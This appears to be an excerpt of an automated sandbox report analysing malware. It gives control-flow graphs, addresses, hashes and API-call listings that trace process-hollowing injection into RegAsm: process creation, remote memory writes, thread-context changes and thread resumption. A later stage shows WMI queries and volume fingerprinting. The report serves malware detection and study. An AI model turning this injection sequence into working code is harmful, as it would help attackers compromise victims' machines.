1802b98 2071->2073 2072 1802bc6 2072->2072 2073->2072 2085 1802810 CreateProcessA 2073->2085 2086 1802805 CreateProcessA 2073->2086 2074 1802c75 2082 1802edf 2074->2082 2101 18023f0 2074->2101 2105 18023e8 2074->2105 2075 1802cdf 2075->2082 2109 1802670 2075->2109 2113 1802678 2075->2113 2076 1802d24 2076->2082 2117 18024c1 2076->2117 2121 18024c8 2076->2121 2077 1802d87 2077->2082 2125 1802588 2077->2125 2129 1802581 2077->2129 2078 1802e57 2091 1802581 WriteProcessMemory 2078->2091 2092 1802588 WriteProcessMemory 2078->2092 2079 1802dae 2079->2078 2079->2082 2089 1802581 WriteProcessMemory 2079->2089 2090 1802588 WriteProcessMemory 2079->2090 2080 1802e80 2080->2082 2083 18023f0 Wow64SetThreadContext 2080->2083 2084 18023e8 Wow64SetThreadContext 2080->2084 2081 1802eca 2081->2082 2133 1802340 2081->2133 2137 1802339 2081->2137 2083->2081 2084->2081 2085->2074 2086->2074 2089->2079 2090->2079 2091->2080 2092->2080 2102 1802435 Wow64SetThreadContext 2101->2102 2104 180247d 2102->2104 2104->2075 2106 18023f0 Wow64SetThreadContext 2105->2106 2108 180247d 2106->2108 2108->2075 2110 1802678 ReadProcessMemory 2109->2110 2112 1802707 2110->2112 2112->2076 2114 18026c3 ReadProcessMemory 2113->2114 2116 1802707 2114->2116 2116->2076 2118 1802508 VirtualAllocEx 2117->2118 2120 1802545 2118->2120 2120->2077 2122 1802508 VirtualAllocEx 2121->2122 2124 1802545 2122->2124 2124->2077 2126 18025d0 WriteProcessMemory 2125->2126 2128 1802627 2126->2128 2128->2079 2130 18025d0 WriteProcessMemory 2129->2130 2132 1802627 2130->2132 2132->2079 2134 1802380 ResumeThread 2133->2134 2136 18023b1 2134->2136 2136->2082 2138 1802340 ResumeThread 2137->2138 2140 18023b1 2138->2140 2140->2082 2141 1802b98 2143 1802bbe 2141->2143 2142 1802bc6 2142->2142 2143->2142 2159 1802810 CreateProcessA 2143->2159 2160 1802805 CreateProcessA 2143->2160 2144 1802c75 2152 1802edf 2144->2152 2169 18023f0 Wow64SetThreadContext 2144->2169 2170 18023e8 Wow64SetThreadContext 2144->2170 2145 1802cdf 2145->2152 2155 1802670 ReadProcessMemory 2145->2155 2156 1802678 ReadProcessMemory 2145->2156 2146 1802d24 2146->2152 2167 18024c1 VirtualAllocEx 2146->2167 2168 18024c8 VirtualAllocEx 2146->2168 2147 1802d87 2147->2152 2153 1802581 WriteProcessMemory 2147->2153 2154 1802588 WriteProcessMemory 2147->2154 2148 1802e57 2165 1802581 WriteProcessMemory 2148->2165 2166 1802588 WriteProcessMemory 2148->2166 2149 1802dae 2149->2148 2149->2152 2163 1802581 WriteProcessMemory 2149->2163 2164 1802588 WriteProcessMemory 2149->2164 2150 1802e80 2150->2152 2157 18023f0 Wow64SetThreadContext 2150->2157 2158 18023e8 Wow64SetThreadContext 2150->2158 2151 1802eca 2151->2152 2161 1802340 ResumeThread 2151->2161 2162 1802339 ResumeThread 2151->2162 2153->2149 2154->2149 2155->2146 2156->2146 2157->2151 2158->2151 2159->2144 2160->2144 2161->2152 2162->2152 2163->2149 2164->2149 2165->2150 2166->2150 2167->2147 2168->2147 2169->2145 2170->2145

                                        Executed Functions

                                        Function 01802805 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 1802805-18028a5 3 18028a7-18028b1 0->3 4 18028de-18028fe 0->4 3->4 5 18028b3-18028b5 3->5 9 1802900-180290a 4->9 10 1802937-1802966 4->10 7 18028b7-18028c1 5->7 8 18028d8-18028db 5->8 11 18028c3 7->11 12 18028c5-18028d4 7->12 8->4 9->10 13 180290c-180290e 9->13 20 1802968-1802972 10->20 21 180299f-1802a59 CreateProcessA 10->21 11->12 12->12 14 18028d6 12->14 15 1802910-180291a 13->15 16 1802931-1802934 13->16 14->8 18 180291c 15->18 19 180291e-180292d 15->19 16->10 18->19 19->19 22 180292f 19->22 20->21 23 1802974-1802976 20->23 32 1802a62-1802ae8 21->32 33 1802a5b-1802a61 21->33 22->16 25 1802978-1802982 23->25 26 1802999-180299c 23->26 27 1802984 25->27 28 1802986-1802995 25->28 26->21 27->28 28->28 29 1802997 28->29 29->26 43 1802af8-1802afc 32->43 44 1802aea-1802aee 32->44 33->32 46 1802b0c-1802b10 43->46 47 1802afe-1802b02 43->47 44->43 45 1802af0-1802af3 call 1800b04 44->45 45->43 50 1802b20-1802b24 46->50 51 1802b12-1802b16 46->51 47->46 49 1802b04-1802b07 call 1800b04 47->49 49->46 54 1802b36-1802b3d 50->54 55 1802b26-1802b2c 50->55 51->50 53 1802b18-1802b1b call 1800b04 51->53 53->50 56 1802b54 54->56 57 1802b3f-1802b4e 54->57 55->54 60 1802b55 56->60 57->56 60->60
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01802A46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: bc895abe7c9ba1daea7a49aa5e9fb5f1da995d119fa4071e14bff191e0eba96d
                                        • Instruction ID: 3c1c5e3e96f4c09288283080cd6dd274db1e5a991ae137be48fecbc10499772a
                                        • Opcode Fuzzy Hash: bc895abe7c9ba1daea7a49aa5e9fb5f1da995d119fa4071e14bff191e0eba96d
                                        • Instruction Fuzzy Hash: 03912871D00619CFEB65CF68CC45BADBBB2BF48314F148169E809E7280DBB49A85CB91
                                        Function 01802810 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 61 1802810-18028a5 63 18028a7-18028b1 61->63 64 18028de-18028fe 61->64 63->64 65 18028b3-18028b5 63->65 69 1802900-180290a 64->69 70 1802937-1802966 64->70 67 18028b7-18028c1 65->67 68 18028d8-18028db 65->68 71 18028c3 67->71 72 18028c5-18028d4 67->72 68->64 69->70 73 180290c-180290e 69->73 80 1802968-1802972 70->80 81 180299f-1802a59 CreateProcessA 70->81 71->72 72->72 74 18028d6 72->74 75 1802910-180291a 73->75 76 1802931-1802934 73->76 74->68 78 180291c 75->78 79 180291e-180292d 75->79 76->70 78->79 79->79 82 180292f 79->82 80->81 83 1802974-1802976 80->83 92 1802a62-1802ae8 81->92 93 1802a5b-1802a61 81->93 82->76 85 1802978-1802982 83->85 86 1802999-180299c 83->86 87 1802984 85->87 88 1802986-1802995 85->88 86->81 87->88 88->88 89 1802997 88->89 89->86 103 1802af8-1802afc 92->103 104 1802aea-1802aee 92->104 93->92 106 1802b0c-1802b10 103->106 107 1802afe-1802b02 103->107 104->103 105 1802af0-1802af3 call 1800b04 104->105 105->103 110 1802b20-1802b24 106->110 111 1802b12-1802b16 106->111 107->106 109 1802b04-1802b07 call 1800b04 107->109 109->106 114 1802b36-1802b3d 110->114 115 1802b26-1802b2c 110->115 111->110 113 1802b18-1802b1b call 1800b04 111->113 113->110 116 1802b54 114->116 117 1802b3f-1802b4e 114->117 115->114 120 1802b55 116->120 117->116 120->120
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01802A46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: fb048deb2f28cba5fc987704ca4d05f311dffbe32b48c4a8bdce7d33f7a08a3d
                                        • Instruction ID: 55f93f056e6eddd17e672bc0f3d9971a46f9bf79222b538f1977e554d2efc7df
                                        • Opcode Fuzzy Hash: fb048deb2f28cba5fc987704ca4d05f311dffbe32b48c4a8bdce7d33f7a08a3d
                                        • Instruction Fuzzy Hash: A0913871D006198FEB65CF68CC45BADBBB2BF48314F148169E809E7280DBB49A85CF91
                                        Function 01802581 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 121 1802581-18025d6 123 18025e6-1802625 WriteProcessMemory 121->123 124 18025d8-18025e4 121->124 126 1802627-180262d 123->126 127 180262e-180265e 123->127 124->123 126->127
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01802618
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 79756ed883d70ff6d56a7e2246a40700ccb66d4e73e542fe2c58563b3d012627
                                        • Instruction ID: bf93293c1a05855b8a19b261e809ddd19e792ff9ab58b7ad45b784f34f86dfab
                                        • Opcode Fuzzy Hash: 79756ed883d70ff6d56a7e2246a40700ccb66d4e73e542fe2c58563b3d012627
                                        • Instruction Fuzzy Hash: D72127B59003499FDF10CFA9C985BEEBBF5FF48310F14842AE919A7250D7789A54CBA0
                                        Function 01802588 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 131 1802588-18025d6 133 18025e6-1802625 WriteProcessMemory 131->133 134 18025d8-18025e4 131->134 136 1802627-180262d 133->136 137 180262e-180265e 133->137 134->133 136->137
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01802618
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: ed022d2b08c157fb835e167cb265522bc264942fd4563a7e2dd2bc6de3f1ca49
                                        • Instruction ID: 3d19dd2ab50d7c07660e3c0acffb06cfac3c7e21739ff6ca146b11f2822c62f0
                                        • Opcode Fuzzy Hash: ed022d2b08c157fb835e167cb265522bc264942fd4563a7e2dd2bc6de3f1ca49
                                        • Instruction Fuzzy Hash: D12107B59003499FDB10DFA9C985BEEBBF5FF48310F108429E919A7240D779A944CBA4
                                        Function 01802670 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 141 1802670-1802705 ReadProcessMemory 145 1802707-180270d 141->145 146 180270e-180273e 141->146 145->146
                                        APIs
                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 018026F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 4e992bde617bb65b2ecac4bd6fb92798cc0309e3e8baada4fcb9f38bfc830b52
                                        • Instruction ID: 227db682f3d366239451448eef43d248f028030c3a02ed553b74fcea884ee15f
                                        • Opcode Fuzzy Hash: 4e992bde617bb65b2ecac4bd6fb92798cc0309e3e8baada4fcb9f38bfc830b52
                                        • Instruction Fuzzy Hash: 742128B18002499FDB10DFAAC885AEEFBF5FF48310F108429E519A7240D778A945DBA4
                                        Function 018023E8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 150 18023e8-180243b 153 180244b-180247b Wow64SetThreadContext 150->153 154 180243d-1802449 150->154 156 1802484-18024b4 153->156 157 180247d-1802483 153->157 154->153 157->156
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0180246E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 7b04e91c32d662eabf93eb3da82c5bcf7a03052a7a384b8e877ce1cf46913798
                                        • Instruction ID: 708fb76988b393d1348129cb0d8f157c2e7b67fcd5d1628d6985f61ef417ba06
                                        • Opcode Fuzzy Hash: 7b04e91c32d662eabf93eb3da82c5bcf7a03052a7a384b8e877ce1cf46913798
                                        • Instruction Fuzzy Hash: 262138B1D002098FDB10DFAAC8857EEBBF5FF48314F148429D559A7240DB78AA45CFA1
                                        Function 018023F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 161 18023f0-180243b 163 180244b-180247b Wow64SetThreadContext 161->163 164 180243d-1802449 161->164 166 1802484-18024b4 163->166 167 180247d-1802483 163->167 164->163 167->166
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0180246E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: dbbd4791535cd5b14bf6e8480ea82824d38626b2997ef405946e0461e2f34068
                                        • Instruction ID: 78632fe41f1c3486b3cb807f900920b9c28b91de12e554cd1936c238e83cd109
                                        • Opcode Fuzzy Hash: dbbd4791535cd5b14bf6e8480ea82824d38626b2997ef405946e0461e2f34068
                                        • Instruction Fuzzy Hash: CA2138B1D002098FDB10DFAAC4857EEBBF5EF48314F108429D559A7240CB78A945CFA1
                                        Function 01802678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 171 1802678-1802705 ReadProcessMemory 174 1802707-180270d 171->174 175 180270e-180273e 171->175 174->175
                                        APIs
                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 018026F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a174e62f8692971bc73af594e7b976fee92401615efd667363aead4bb767ccca
                                        • Instruction ID: 27914c1b3d3c8e3df72f40af873e9878dda7e7d222124161f3117f58fe1036db
                                        • Opcode Fuzzy Hash: a174e62f8692971bc73af594e7b976fee92401615efd667363aead4bb767ccca
                                        • Instruction Fuzzy Hash: 342137B1C003499FDB10DFAAC885AEEFBF5FF48310F10842AE519A7240C778A944CBA0
                                        Function 018024C1 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 179 18024c1-1802543 VirtualAllocEx 182 1802545-180254b 179->182 183 180254c-1802571 179->183 182->183
                                        APIs
                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01802536
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: ff760f67f4dd328a503d7213c4430346ba3a41d260ce31026f8571d353d33396
                                        • Instruction ID: 6104ad7fdd97801a7f28e2c70d4fb61dd11b156a1910877fc107be035a759f1b
                                        • Opcode Fuzzy Hash: ff760f67f4dd328a503d7213c4430346ba3a41d260ce31026f8571d353d33396
                                        • Instruction Fuzzy Hash: 471156728002498FCB20DFA9C949BEEBFF6FF88310F14841AE519A7250C7799654CFA0
                                        Function 018024C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 18024c8-1802543 VirtualAllocEx 190 1802545-180254b 187->190 191 180254c-1802571 187->191 190->191
                                        APIs
                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01802536
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: cfcf61d157d26ad49d97d086d785964474b211510cfbebe16e3811520e630ca0
                                        • Instruction ID: 740cf73be7e27bbea264c15f16ce1033c378a70b50f8799ff7859a8d8cda834e
                                        • Opcode Fuzzy Hash: cfcf61d157d26ad49d97d086d785964474b211510cfbebe16e3811520e630ca0
                                        • Instruction Fuzzy Hash: EE1137729002499FDB10DFAAC845AEEFFF5FF88310F108419E519A7250C779A544CFA0
                                        Function 01802339 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 195 1802339-18023af ResumeThread 199 18023b1-18023b7 195->199 200 18023b8-18023dd 195->200 199->200
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: c13e4177967389a177e4a9b0cd484ac45475b60f5c4d3f637ee0c468fe2fa6de
                                        • Instruction ID: c352f76e0d245e4910018122ef242a72eef3f6d2d58756bf9401d04ec6670bc0
                                        • Opcode Fuzzy Hash: c13e4177967389a177e4a9b0cd484ac45475b60f5c4d3f637ee0c468fe2fa6de
                                        • Instruction Fuzzy Hash: 4A113AB1D003488FDB24DFAAC8457EEFBF5EF88314F248419D519A7250CB79A544CBA0
                                        Function 01802340 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 204 1802340-18023af ResumeThread 207 18023b1-18023b7 204->207 208 18023b8-18023dd 204->208 207->208
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2139470954.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1800000_htZgRRla8S.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 8cea6f62f6eabb0571f1bead6f15e28ec259123386613710c4efd68d8076bc6a
                                        • Instruction ID: 2343bdc38d3c3edffd6d976da4d71c2e45e7e139dda18f68ae7c8f6177d424ce
                                        • Opcode Fuzzy Hash: 8cea6f62f6eabb0571f1bead6f15e28ec259123386613710c4efd68d8076bc6a
                                        • Instruction Fuzzy Hash: F6113AB1D003488FDB24DFAAC8457EEFBF5EF88314F208419D519A7250CB79A544CBA0

                                        Execution Graph

                                        Execution Coverage:2.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:57.6%
                                        Total number of Nodes:59
                                        Total number of Limit Nodes:5
                                        execution_graph 13676 4087f0 13678 4087fc 13676->13678 13677 408979 ExitProcess 13678->13677 13679 408811 GetCurrentProcessId GetCurrentThreadId 13678->13679 13680 408974 13678->13680 13682 408851 GetForegroundWindow 13679->13682 13683 40884b 13679->13683 13689 43b400 13680->13689 13684 4088d8 13682->13684 13683->13682 13684->13680 13688 40cdf0 CoInitializeEx 13684->13688 13692 43ca40 13689->13692 13691 43b405 FreeLibrary 13691->13677 13693 43ca49 13692->13693 13693->13691 13643 43b781 13645 43b822 13643->13645 13644 43bace 13645->13644 13647 43b480 LdrInitializeThunk 13645->13647 13647->13644 13694 43bf91 13696 43bef0 13694->13696 13695 43bff7 13696->13695 13699 43b480 LdrInitializeThunk 13696->13699 13698 43c01d 13699->13698 13648 43b720 GetForegroundWindow 13652 43d320 13648->13652 13650 43b72e GetForegroundWindow 13651 43b74e 13650->13651 13653 43d330 13652->13653 13653->13650 13659 40ce23 CoInitializeSecurity 13660 40d2c5 CoUninitialize 13661 40e062 13660->13661 13700 40ce55 13701 40ce70 13700->13701 13701->13701 13704 436f90 13701->13704 13703 40ceb9 13705 436fc0 CoCreateInstance 13704->13705 13707 437181 SysAllocString 13705->13707 13708 437526 13705->13708 13711 4371fe 13707->13711 13709 437536 GetVolumeInformationW 13708->13709 13720 437558 13709->13720 13712 437516 SysFreeString 13711->13712 13713 437206 CoSetProxyBlanket 13711->13713 13712->13708 13714 437226 SysAllocString 13713->13714 13715 43750c 13713->13715 13717 4372f0 13714->13717 13715->13712 13717->13717 13718 437315 SysAllocString 13717->13718 13722 43733c 13718->13722 13719 4374fa SysFreeString SysFreeString 13719->13715 13720->13703 13721 4374f0 13721->13719 13722->13719 13722->13721 13723 437380 VariantInit 13722->13723 13725 4373d0 13723->13725 13724 4374df VariantClear 13724->13721 13725->13724 13662 43bc65 13663 43bc90 13662->13663 13666 43bcde 13663->13666 13669 43b480 LdrInitializeThunk 13663->13669 13664 43bd6f 13666->13664 13670 43b480 LdrInitializeThunk 13666->13670 13668 43bde7 13669->13666 13670->13668

                                        Executed Functions

                                        Function 00436F90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 571memorycomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 436f90-436fb8 1 436fc0-437006 0->1 1->1 2 437008-43701f 1->2 3 437020-43705b 2->3 3->3 4 43705d-43709a 3->4 5 4370a0-4370b2 4->5 5->5 6 4370b4-4370cd 5->6 8 4370d7-4370e2 6->8 9 4370cf 6->9 10 4370f0-437122 8->10 9->8 10->10 11 437124-43717b CoCreateInstance 10->11 12 437181-4371b2 11->12 13 437526-437556 call 43ce00 GetVolumeInformationW 11->13 15 4371c0-4371d4 12->15 18 437560-437562 13->18 19 437558-43755c 13->19 15->15 17 4371d6-437200 SysAllocString 15->17 24 437516-437522 SysFreeString 17->24 25 437206-437220 CoSetProxyBlanket 17->25 20 437587-43758e 18->20 19->18 22 437590-437597 20->22 23 4375a7-4375bf 20->23 22->23 26 437599-4375a5 22->26 27 4375c0-4375d4 23->27 24->13 28 437226-43723a 25->28 29 43750c-437512 25->29 26->23 27->27 31 4375d6-43760f 27->31 30 437240-437261 28->30 29->24 30->30 32 437263-4372e3 SysAllocString 30->32 33 437610-437650 31->33 34 4372f0-437313 32->34 33->33 35 437652-43767f call 41dc20 33->35 34->34 36 437315-43733e SysAllocString 34->36 39 437680-437688 35->39 42 437344-437366 36->42 43 4374fa-43750a SysFreeString * 2 36->43 39->39 41 43768a-43768c 39->41 44 437692-4376a2 call 408070 41->44 45 437570-437581 41->45 50 4374f0-4374f6 42->50 51 43736c-43736f 42->51 43->29 44->45 45->20 47 4376a7-4376ae 45->47 50->43 51->50 52 437375-43737a 51->52 52->50 53 437380-4373c8 VariantInit 52->53 54 4373d0-4373e4 53->54 54->54 55 4373e6-4373f4 54->55 56 4373f8-4373fa 55->56 57 437400-437406 56->57 58 4374df-4374ec VariantClear 56->58 57->58 59 43740c-43741a 57->59 58->50 60 437467 59->60 61 43741c-437421 59->61 63 437469-4374a2 call 407ff0 call 408e90 60->63 62 437446-43744a 61->62 64 437430-437438 62->64 65 43744c-437455 62->65 74 4374a4 63->74 75 4374a9-4374b1 63->75 67 43743b-437444 64->67 68 437457-43745a 65->68 69 43745c-437460 65->69 67->62 67->63 68->67 69->67 71 437462-437465 69->71 71->67 74->75 76 4374b3 75->76 77 4374b8-4374db call 408020 call 408000 75->77 76->77 77->58
                                        APIs
                                        • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                        • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                        • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                        • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                        • VariantInit.OLEAUT32(.'()), ref: 00437385
                                        • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                        • SysFreeString.OLEAUT32(?), ref: 00437504
                                        • SysFreeString.OLEAUT32(?), ref: 0043750A
                                        • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                        • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                        • API String ID: 2573436264-264043890
                                        • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                        • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                        • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                        • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96
                                        Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 82 40a960-40a989 83 40a990-40a9e5 82->83 83->83 84 40a9e7-40aadf 83->84 85 40aae0-40ab1b 84->85 85->85 86 40ab1d-40ab39 85->86 87 40ab40-40ab69 86->87 87->87 88 40ab6b-40ab7a call 40b6a0 87->88 90 40ab7f-40ab86 88->90 91 40ae29-40ae32 90->91 92 40ab8c-40ab98 90->92 93 40aba0-40abb2 92->93 93->93 94 40abb4-40abb9 93->94 95 40abc0-40abcc 94->95 96 40abd3-40abe4 95->96 97 40abce-40abd1 95->97 98 40ae20-40ae26 call 439b60 96->98 99 40abea-40abff 96->99 97->95 97->96 98->91 101 40ac00-40ac41 99->101 101->101 102 40ac43-40ac50 101->102 104 40ac52-40ac58 102->104 105 40ac84-40ac88 102->105 106 40ac67-40ac6b 104->106 107 40ae1e 105->107 108 40ac8e-40acb6 105->108 106->107 109 40ac71-40ac78 106->109 107->98 110 40acc0-40acf4 108->110 111 40ac7a-40ac7c 109->111 112 40ac7e 109->112 110->110 113 40acf6-40acff 110->113 111->112 114 40ac60-40ac65 112->114 115 40ac80-40ac82 112->115 116 40ad01-40ad0b 113->116 117 40ad34-40ad36 113->117 114->105 114->106 115->114 119 40ad17-40ad1b 116->119 117->107 118 40ad3c-40ad52 117->118 120 40ad60-40adb2 118->120 119->107 121 40ad21-40ad28 119->121 120->120 124 40adb4-40adbe 120->124 122 40ad2a-40ad2c 121->122 123 40ad2e 121->123 122->123 125 40ad10-40ad15 123->125 126 40ad30-40ad32 123->126 127 40adc0-40adc8 124->127 128 40adf4-40adf8 124->128 125->117 125->119 126->125 129 40add7-40addb 127->129 130 40adfe-40ae1c call 40a6d0 128->130 129->107 132 40addd-40ade4 129->132 130->98 134 40ade6-40ade8 132->134 135 40adea-40adec 132->135 134->135 136 40add0-40add5 135->136 137 40adee-40adf2 135->137 136->129 138 40adfa-40adfc 136->138 137->136 138->107 138->130
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                        • API String ID: 0-490458541
